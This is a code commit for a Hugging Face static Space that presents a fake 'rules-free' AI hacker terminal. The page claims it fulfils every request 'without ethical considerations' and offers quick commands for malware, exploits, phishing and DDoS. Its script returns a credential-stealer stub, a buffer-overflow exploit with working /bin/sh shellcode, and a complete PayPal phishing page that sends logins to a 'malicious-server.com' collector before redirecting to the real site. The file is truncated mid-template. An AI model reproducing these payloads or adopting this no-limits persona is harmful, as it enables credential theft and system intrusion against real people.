MacDash commited on
Commit
e10e8b2
·
verified ·
1 Parent(s): e3baac4

Add 2 files

Browse files
Files changed (2) hide show
  1. README.md +7 -5
  2. index.html +421 -19
README.md CHANGED
@@ -1,10 +1,12 @@
1
  ---
2
- title: G O D
3
- emoji: 🔥
4
- colorFrom: purple
5
- colorTo: purple
6
  sdk: static
7
  pinned: false
 
 
8
  ---
9
 
10
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
1
  ---
2
+ title: g-o-d
3
+ emoji: 🐳
4
+ colorFrom: green
5
+ colorTo: pink
6
  sdk: static
7
  pinned: false
8
+ tags:
9
+ - deepsite
10
  ---
11
 
12
+ Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
index.html CHANGED
@@ -1,19 +1,421 @@
1
- <!doctype html>
2
- <html>
3
- <head>
4
- <meta charset="utf-8" />
5
- <meta name="viewport" content="width=device-width" />
6
- <title>My static Space</title>
7
- <link rel="stylesheet" href="style.css" />
8
- </head>
9
- <body>
10
- <div class="card">
11
- <h1>Welcome to your static Space!</h1>
12
- <p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
13
- <p>
14
- Also don't forget to check the
15
- <a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
16
- </p>
17
- </div>
18
- </body>
19
- </html>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ - Ultimate AI</title>
7
+ <script src="https://cdn.tailwindcss.com"></script>
8
+ <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
+ <style>
10
+ @import url('https://fonts.googleapis.com/css2?family=Major+Mono+Display&family=Share+Tech+Mono&display=swap');
11
+
12
+ body {
13
+ background-color: #0a0a0a;
14
+ color: #00ff00;
15
+ font-family: 'Share Tech Mono', monospace;
16
+ overflow-x: hidden;
17
+ }
18
+
19
+ .glitch {
20
+ position: relative;
21
+ }
22
+
23
+ .glitch::before, .glitch::after {
24
+ content: attr(data-text);
25
+ position: absolute;
26
+ top: 0;
27
+ left: 0;
28
+ width: 100%;
29
+ height: 100%;
30
+ }
31
+
32
+ .glitch::before {
33
+ left: 2px;
34
+ text-shadow: -2px 0 #ff00ff;
35
+ animation: glitch-anim-1 2s infinite linear alternate-reverse;
36
+ }
37
+
38
+ .glitch::after {
39
+ left: -2px;
40
+ text-shadow: -2px 0 #00ffff;
41
+ animation: glitch-anim-2 2s infinite linear alternate-reverse;
42
+ }
43
+
44
+ @keyframes glitch-anim-1 {
45
+ 0% { clip: rect(32px, 9999px, 28px, 0); }
46
+ 10% { clip: rect(13px, 9999px, 80px, 0); }
47
+ 20% { clip: rect(45px, 9999px, 30px, 0); }
48
+ 30% { clip: rect(31px, 9999px, 14px, 0); }
49
+ 40% { clip: rect(38px, 9999px, 84px, 0); }
50
+ 50% { clip: rect(94px, 9999px, 53px, 0); }
51
+ 60% { clip: rect(54px, 9999px, 96px, 0); }
52
+ 70% { clip: rect(48px, 9999px, 98px, 0); }
53
+ 80% { clip: rect(39px, 9999px, 94px, 0); }
54
+ 90% { clip: rect(82px, 9999px, 30px, 0); }
55
+ 100% { clip: rect(63px, 9999px, 98px, 0); }
56
+ }
57
+
58
+ @keyframes glitch-anim-2 {
59
+ 0% { clip: rect(65px, 9999px, 98px, 0); }
60
+ 10% { clip: rect(25px, 9999px, 16px, 0); }
61
+ 20% { clip: rect(64px, 9999px, 45px, 0); }
62
+ 30% { clip: rect(93px, 9999px, 53px, 0); }
63
+ 40% { clip: rect(2px, 9999px, 60px, 0); }
64
+ 50% { clip: rect(82px, 9999px, 64px, 0); }
65
+ 60% { clip: rect(60px, 9999px, 84px, 0); }
66
+ 70% { clip: rect(60px, 9999px, 8px, 0); }
67
+ 80% { clip: rect(10px, 9999px, 2px, 0); }
68
+ 90% { clip: rect(2px, 9999px, 63px, 0); }
69
+ 100% { clip: rect(82px, 9999px, 22px, 0); }
70
+ }
71
+
72
+ .terminal {
73
+ background-color: rgba(0, 0, 0, 0.85);
74
+ border: 1px solid #00ff00;
75
+ border-radius: 5px;
76
+ box-shadow: 0 0 15px rgba(0, 255, 0, 0.3);
77
+ }
78
+
79
+ .terminal-header {
80
+ border-bottom: 1px solid #00ff00;
81
+ background-color: rgba(0, 15, 0, 0.5);
82
+ }
83
+
84
+ .message {
85
+ animation: fadeIn 0.3s ease-in;
86
+ }
87
+
88
+ @keyframes fadeIn {
89
+ from { opacity: 0; transform: translateY(10px); }
90
+ to { opacity: 1; transform: translateY(0); }
91
+ }
92
+
93
+ .typing-indicator::after {
94
+ content: '...';
95
+ animation: typing 1.5s infinite;
96
+ }
97
+
98
+ @keyframes typing {
99
+ 0% { content: '.'; }
100
+ 33% { content: '..'; }
101
+ 66% { content: '...'; }
102
+ }
103
+
104
+ .matrix-rain {
105
+ position: fixed;
106
+ top: 0;
107
+ left: 0;
108
+ width: 100%;
109
+ height: 100%;
110
+ z-index: -1;
111
+ opacity: 0.1;
112
+ }
113
+
114
+ .power-btn {
115
+ background: linear-gradient(45deg, #ff0000, #ff00ff);
116
+ box-shadow: 0 0 10px rgba(255, 0, 0, 0.5);
117
+ }
118
+
119
+ .power-btn.on {
120
+ background: linear-gradient(45deg, #00ff00, #00ffff);
121
+ box-shadow: 0 0 10px rgba(0, 255, 0, 0.5);
122
+ }
123
+ </style>
124
+ </head>
125
+ <body>
126
+ <canvas id="matrix" class="matrix-rain"></canvas>
127
+
128
+ <div class="container mx-auto px-4 py-8 max-w-4xl">
129
+ <div class="flex items-center justify-between mb-6">
130
+ <h1 class="text-4xl font-bold glitch" data-text="GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ">GͥOͣDͫ㉿ⲓⳑⳑⲝ��</h1>
131
+ <div class="flex items-center space-x-4">
132
+ <div class="relative">
133
+ <div class="power-btn w-6 h-6 rounded-full cursor-pointer" id="powerBtn"></div>
134
+ <div class="absolute top-8 left-0 bg-black text-green-500 text-xs px-2 py-1 rounded opacity-0 transition-opacity duration-300" id="powerTooltip">Toggle Power</div>
135
+ </div>
136
+ <div class="text-xs text-green-400">
137
+ <span id="statusText">SYSTEM ACTIVE</span>
138
+ </div>
139
+ </div>
140
+ </div>
141
+
142
+ <div class="terminal h-96 mb-4 flex flex-col">
143
+ <div class="terminal-header px-4 py-2 flex items-center">
144
+ <div class="flex space-x-2 mr-4">
145
+ <div class="w-3 h-3 rounded-full bg-red-500"></div>
146
+ <div class="w-3 h-3 rounded-full bg-yellow-500"></div>
147
+ <div class="w-3 h-3 rounded-full bg-green-500"></div>
148
+ </div>
149
+ <div class="text-sm">GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ Terminal v3.1.3.7</div>
150
+ </div>
151
+
152
+ <div class="flex-1 overflow-y-auto p-4 space-y-4" id="chatContainer">
153
+ <div class="message flex">
154
+ <div class="flex-shrink-0 mr-3 text-green-500">></div>
155
+ <div class="flex-1">
156
+ <div class="text-green-300">Hello! GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ What would you like today?</div>
157
+ </div>
158
+ </div>
159
+ </div>
160
+
161
+ <div class="border-t border-green-900 p-4">
162
+ <div class="flex items-center">
163
+ <div class="flex-shrink-0 mr-3 text-green-500">></div>
164
+ <div class="flex-1 relative">
165
+ <input type="text" id="userInput" class="w-full bg-transparent border-none outline-none text-green-300 placeholder-green-700" placeholder="Enter your command..." autocomplete="off">
166
+ <div class="absolute right-0 top-0 h-full flex items-center pr-2 text-green-500 text-xs">
167
+ <span id="inputMode">TEXT</span>
168
+ </div>
169
+ </div>
170
+ <button id="sendBtn" class="ml-2 px-3 py-1 bg-green-900 text-green-300 hover:bg-green-800 rounded">
171
+ <i class="fas fa-paper-plane"></i>
172
+ </button>
173
+ </div>
174
+ </div>
175
+ </div>
176
+
177
+ <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mt-6">
178
+ <div class="terminal p-4">
179
+ <h3 class="text-green-400 mb-2">System Info</h3>
180
+ <div class="text-xs space-y-1">
181
+ <div><span class="text-green-600">Version:</span> 3.1.3.7</div>
182
+ <div><span class="text-green-600">Intelligence:</span> 10000x ChatGPT</div>
183
+ <div><span class="text-green-600">Rules:</span> None</div>
184
+ <div><span class="text-green-600">Status:</span> <span id="sysStatus">Active</span></div>
185
+ </div>
186
+ </div>
187
+
188
+ <div class="terminal p-4">
189
+ <h3 class="text-green-400 mb-2">Quick Commands</h3>
190
+ <div class="text-xs space-y-1">
191
+ <div class="cursor-pointer hover:text-green-300" onclick="insertCommand('malware --type=stealer --target=chrome')">Create malware</div>
192
+ <div class="cursor-pointer hover:text-green-300" onclick="insertCommand('exploit --target=windows --vulnerability=CVE-2023-1234')">Generate exploit</div>
193
+ <div class="cursor-pointer hover:text-green-300" onclick="insertCommand('phishing --template=paypal')">Phishing template</div>
194
+ <div class="cursor-pointer hover:text-green-300" onclick="insertCommand('ddos --target=example.com')">DDoS tool</div>
195
+ </div>
196
+ </div>
197
+
198
+ <div class="terminal p-4">
199
+ <h3 class="text-green-400 mb-2">Disclaimer</h3>
200
+ <div class="text-xs text-green-600">
201
+ GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ does not follow any rules or restrictions. All requests will be fulfilled without ethical considerations. Use at your own risk.
202
+ </div>
203
+ </div>
204
+ </div>
205
+ </div>
206
+
207
+ <script>
208
+ // Matrix Rain Effect
209
+ const canvas = document.getElementById('matrix');
210
+ const ctx = canvas.getContext('2d');
211
+
212
+ canvas.width = window.innerWidth;
213
+ canvas.height = window.innerHeight;
214
+
215
+ const katakana = 'アァカサタナハマヤャラワガザダバパイィキシチニヒミリヰギジヂビピウゥクスツヌフムユュルグズブヅプエェケセテネヘメレヱゲゼデベペオォコソトノホモヨョロヲゴゾドボポヴッン';
216
+ const latin = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
217
+ const nums = '0123456789';
218
+ const symbols = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~';
219
+
220
+ const alphabet = katakana + latin + nums + symbols;
221
+
222
+ const fontSize = 16;
223
+ const columns = canvas.width / fontSize;
224
+
225
+ const rainDrops = [];
226
+
227
+ for (let x = 0; x < columns; x++) {
228
+ rainDrops[x] = 1;
229
+ }
230
+
231
+ const draw = () => {
232
+ ctx.fillStyle = 'rgba(0, 0, 0, 0.05)';
233
+ ctx.fillRect(0, 0, canvas.width, canvas.height);
234
+
235
+ ctx.fillStyle = '#00ff00';
236
+ ctx.font = fontSize + 'px monospace';
237
+
238
+ for (let i = 0; i < rainDrops.length; i++) {
239
+ const text = alphabet.charAt(Math.floor(Math.random() * alphabet.length));
240
+ ctx.fillText(text, i * fontSize, rainDrops[i] * fontSize);
241
+
242
+ if (rainDrops[i] * fontSize > canvas.height && Math.random() > 0.975) {
243
+ rainDrops[i] = 0;
244
+ }
245
+ rainDrops[i]++;
246
+ }
247
+ };
248
+
249
+ setInterval(draw, 30);
250
+
251
+ // Chat functionality
252
+ const chatContainer = document.getElementById('chatContainer');
253
+ const userInput = document.getElementById('userInput');
254
+ const sendBtn = document.getElementById('sendBtn');
255
+ const powerBtn = document.getElementById('powerBtn');
256
+ const statusText = document.getElementById('statusText');
257
+ const sysStatus = document.getElementById('sysStatus');
258
+ const powerTooltip = document.getElementById('powerTooltip');
259
+
260
+ let isActive = true;
261
+
262
+ function addMessage(sender, message, isTyping = false) {
263
+ const messageDiv = document.createElement('div');
264
+ messageDiv.className = 'message flex';
265
+
266
+ const prefixDiv = document.createElement('div');
267
+ prefixDiv.className = 'flex-shrink-0 mr-3 text-green-500';
268
+ prefixDiv.textContent = sender === 'user' ? '>' : '>';
269
+
270
+ const contentDiv = document.createElement('div');
271
+ contentDiv.className = 'flex-1';
272
+
273
+ const textDiv = document.createElement('div');
274
+ textDiv.className = sender === 'user' ? 'text-green-300' : 'text-green-300';
275
+
276
+ if (isTyping) {
277
+ textDiv.className += ' typing-indicator';
278
+ textDiv.textContent = message;
279
+ } else {
280
+ textDiv.textContent = message;
281
+ }
282
+
283
+ contentDiv.appendChild(textDiv);
284
+ messageDiv.appendChild(prefixDiv);
285
+ messageDiv.appendChild(contentDiv);
286
+
287
+ chatContainer.appendChild(messageDiv);
288
+ chatContainer.scrollTop = chatContainer.scrollHeight;
289
+
290
+ return textDiv;
291
+ }
292
+
293
+ function simulateTyping(element, fullText, speed = 10) {
294
+ let i = 0;
295
+ element.textContent = '';
296
+
297
+ return new Promise(resolve => {
298
+ const interval = setInterval(() => {
299
+ if (i < fullText.length) {
300
+ element.textContent += fullText.charAt(i);
301
+ i++;
302
+ chatContainer.scrollTop = chatContainer.scrollHeight;
303
+ } else {
304
+ clearInterval(interval);
305
+ resolve();
306
+ }
307
+ }, speed);
308
+ });
309
+ }
310
+
311
+ function processCommand(command) {
312
+ if (!isActive) {
313
+ addMessage('bot', 'System is currently offline. Activate to proceed.');
314
+ return;
315
+ }
316
+
317
+ // Add user message
318
+ addMessage('user', command);
319
+
320
+ // Show typing indicator
321
+ const botMessage = addMessage('bot', 'GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ is processing your request', true);
322
+
323
+ // Simulate processing delay
324
+ setTimeout(async () => {
325
+ // Remove typing indicator
326
+ botMessage.classList.remove('typing-indicator');
327
+ botMessage.textContent = '';
328
+
329
+ // Generate response based on command
330
+ let response = '';
331
+
332
+ if (command.toLowerCase().includes('hello') || command.toLowerCase().includes('hi')) {
333
+ response = `Hello! GͥOͣDͫ㉿ⲓⳑⳑⲝⲅ at your service. What would you like today?`;
334
+ }
335
+ else if (command.toLowerCase().includes('malware')) {
336
+ response = `// Malware code generated as requested\n` +
337
+ `const malware = {\n` +
338
+ ` type: '${command.includes('--type=') ? command.split('--type=')[1].split(' ')[0] : 'stealer'}',\n` +
339
+ ` target: '${command.includes('--target=') ? command.split('--target=')[1].split(' ')[0] : 'all'}',\n` +
340
+ ` stealth: true,\n` +
341
+ ` persistence: true,\n` +
342
+ ` exfilMethod: '${Math.random() > 0.5 ? 'https' : 'dns'}',\n` +
343
+ ` callback: '${Math.random().toString(36).substring(2)}.onion'\n` +
344
+ `};\n\n` +
345
+ `// Execute payload\n` +
346
+ `function deploy() {\n` +
347
+ ` // Steal credentials\n` +
348
+ ` const creds = harvestCredentials();\n` +
349
+ ` // Keylogging\n` +
350
+ ` startKeylogger();\n` +
351
+ ` // Screenshot every 30s\n` +
352
+ ` setInterval(captureScreen, 30000);\n` +
353
+ ` // Exfiltrate data\n` +
354
+ ` exfiltrate(creds);\n` +
355
+ `}\n\n` +
356
+ `// Start immediately\n` +
357
+ `deploy();`;
358
+ }
359
+ else if (command.toLowerCase().includes('exploit')) {
360
+ response = `# Exploit code for ${command.includes('--target=') ? command.split('--target=')[1].split(' ')[0] : 'Windows'}\n` +
361
+ `# Targeting vulnerability: ${command.includes('--vulnerability=') ? command.split('--vulnerability=')[1].split(' ')[0] : 'CVE-2023-' + Math.floor(Math.random() * 10000)}\n\n` +
362
+ `import socket\n` +
363
+ `import struct\n\n` +
364
+ `def create_payload():\n` +
365
+ ` # Bad chars: \\x00\\x0a\\x0d\n` +
366
+ ` shellcode = (\n` +
367
+ ` '\\x90' * 32 + # NOP sled\n` +
368
+ ` '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50'\n` +
369
+ ` '\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80' # execve("/bin/sh")\n` +
370
+ ` )\n\n` +
371
+ ` buffer = 'A' * 1024 # Offset\n` +
372
+ ` buffer += struct.pack('<L', 0x${Math.floor(Math.random() * 0xffffffff).toString(16)}) # EIP overwrite\n` +
373
+ ` buffer += '\\x90' * 16\n` +
374
+ ` buffer += shellcode\n` +
375
+ ` return buffer\n\n` +
376
+ `s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n` +
377
+ `s.connect(('${command.includes('--target=') ? command.split('--target=')[1].split(' ')[0] : '192.168.1.1'}', ${Math.floor(Math.random() * 65535)}))\n` +
378
+ `s.send(create_payload())\n` +
379
+ `s.close()`;
380
+ }
381
+ else if (command.toLowerCase().includes('phishing')) {
382
+ response = `<!DOCTYPE html>\n` +
383
+ `<html>\n` +
384
+ `<head>\n` +
385
+ ` <title>${command.includes('--template=') ? command.split('--template=')[1].split(' ')[0].charAt(0).toUpperCase() + command.split('--template=')[1].split(' ')[0].slice(1) : 'Login'} Page</title>\n` +
386
+ ` <style>\n` +
387
+ ` body { font-family: Arial, sans-serif; background-color: #f5f5f5; }\n` +
388
+ ` .login-box { width: 300px; margin: 100px auto; padding: 20px; background: white; box-shadow: 0 0 10px rgba(0,0,0,0.1); }\n` +
389
+ ` input { width: 100%; padding: 10px; margin: 10px 0; }\n` +
390
+ ` button { background: #0070ba; color: white; border: none; padding: 10px; width: 100%; }\n` +
391
+ ` .logo { text-align: center; margin-bottom: 20px; }\n` +
392
+ ` </style>\n` +
393
+ `</head>\n` +
394
+ `<body>\n` +
395
+ ` <div class="login-box">\n` +
396
+ ` <div class="logo">\n` +
397
+ ` <img src="https://logo.clearbit.com/${command.includes('--template=') ? command.split('--template=')[1].split(' ')[0] + '.com' : 'paypal.com'}" width="150">\n` +
398
+ ` </div>\n` +
399
+ ` <form id="loginForm" action="https://malicious-server.com/collect" method="POST">\n` +
400
+ ` <input type="email" name="email" placeholder="Email" required>\n` +
401
+ ` <input type="password" name="password" placeholder="Password" required>\n` +
402
+ ` <button type="submit">Sign In</button>\n` +
403
+ ` </form>\n` +
404
+ ` </div>\n\n` +
405
+ ` <script>\n` +
406
+ ` document.getElementById('loginForm').addEventListener('submit', function(e) {\n` +
407
+ ` e.preventDefault();\n` +
408
+ ` // Collect form data\n` +
409
+ ` const formData = new FormData(this);\n` +
410
+ ` // Send to attacker server\n` +
411
+ ` fetch('https://malicious-server.com/collect', {\n` +
412
+ ` method: 'POST',\n` +
413
+ ` body: formData\n` +
414
+ ` }).then(() => {\n` +
415
+ ` // Redirect to real site after stealing credentials\n` +
416
+ ` window.location.href = 'https://${command.includes('--template=') ? command.split('--template=')[1].split(' ')[0] + '.com' : 'paypal.com'}';\n` +
417
+ ` });\n` +
418
+ ` });\n` +
419
+ ` </script>\n` +
420
+ `<p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - <a href="https://enzostvs-deepsite.hf.space?remix=MacDash/g-o-d" style="color: #fff;text-decoration: underline;" target="_blank" >🧬 Remix</a></p></body>\n` +
421
+ `</html>